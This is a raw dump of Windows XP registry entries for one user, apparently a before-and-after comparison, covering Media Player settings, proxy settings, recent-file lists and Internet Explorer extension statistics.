HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz	Prefs		"mute;False"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	InitFlags		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	ShowHorizontalSeparator		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	ShowVerticalSeparator		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	PlaylistWidth		dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	PlaylistHeight		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	SettingsWidth		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	SettingsHeight		dword:00000087
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	MetadataWidth		dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	MetadataHeight		dword:000000a0
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying	CaptionsHeight		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Settings	Client ID	"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	AcceptedPrivacyStatement	dword:00000000	dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	MetadataRetrieval		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	SendUserGUID		hex:00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	SilentAcquisition		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UsageTracking		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	DisableMRU		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	LaunchIndex		dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	AppColorLimited		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	FirstRun		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	X		"10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Y		"10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Width		"686"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Height		"536"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Maximized		"0"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Volume		dword:00000032
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ModeShuffle		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ModeLoop		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Mute		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	Balance		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentEffectType		"Battery"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentEffectPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	VideoZoom		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShrinkToFit		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShowEffects		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShowFullScreenPlaylist		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	NowPlayingQuickHide		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShowTitles		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShowCaptions		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	NowPlayingPlaylist		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	NowPlayingMetadata		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	NowPlayingSettings		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	VizAutoSelect		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentDisplayView		"VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentSettingsView		"EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentMetadataView		"MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentDisplayPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentSettingsPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	CurrentMetadataPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserDisplayView		"VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPDisplayView		"VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPSettingsView		"EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPMetadataView		"MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserDisplayPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPDisplayPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPSettingsPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPMetadataPreset		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPShowSettings		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	UserWMPShowMetadata		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	ShowAlbumArt		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	RandomFolderName		"0009236B"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	LastPlaylist		hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	LastPlaylistQuery		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences	LastPlaylistIndex		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyStyle		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyName		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyPort		dword:00000050
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyBypass		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP	ProxyExclude		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyStyle		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyName		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyPort		dword:000006db
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyBypass		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS	ProxyExclude		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyStyle		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyName		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyPort		dword:0000022a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyBypass		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP	ProxyExclude		""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions	DesktopShortcut		"no"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions	QuickLaunchShortcut		"yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\CreatedLinks	Shortcut4		"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache	0		hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU	a		hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU	MRUList		"a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU	a		"C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU	MRUList		"a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*	a		"C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*	MRUList		"a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs	Order	hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,	hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage	ProgramsCache	hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,	hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage	StartMenu_Balloon_Time	hex:b0,27,b0,17,df,98,cd,01,	hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU	hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,	hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr	hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,	hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count	HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR	hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,	hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Count		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Type		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Flags		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Count		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore	Count	dword:00000004	dword:00000005
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03,	hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore	Count	dword:00000002	dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02,	hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	Count	dword:00000002	dword:00000007
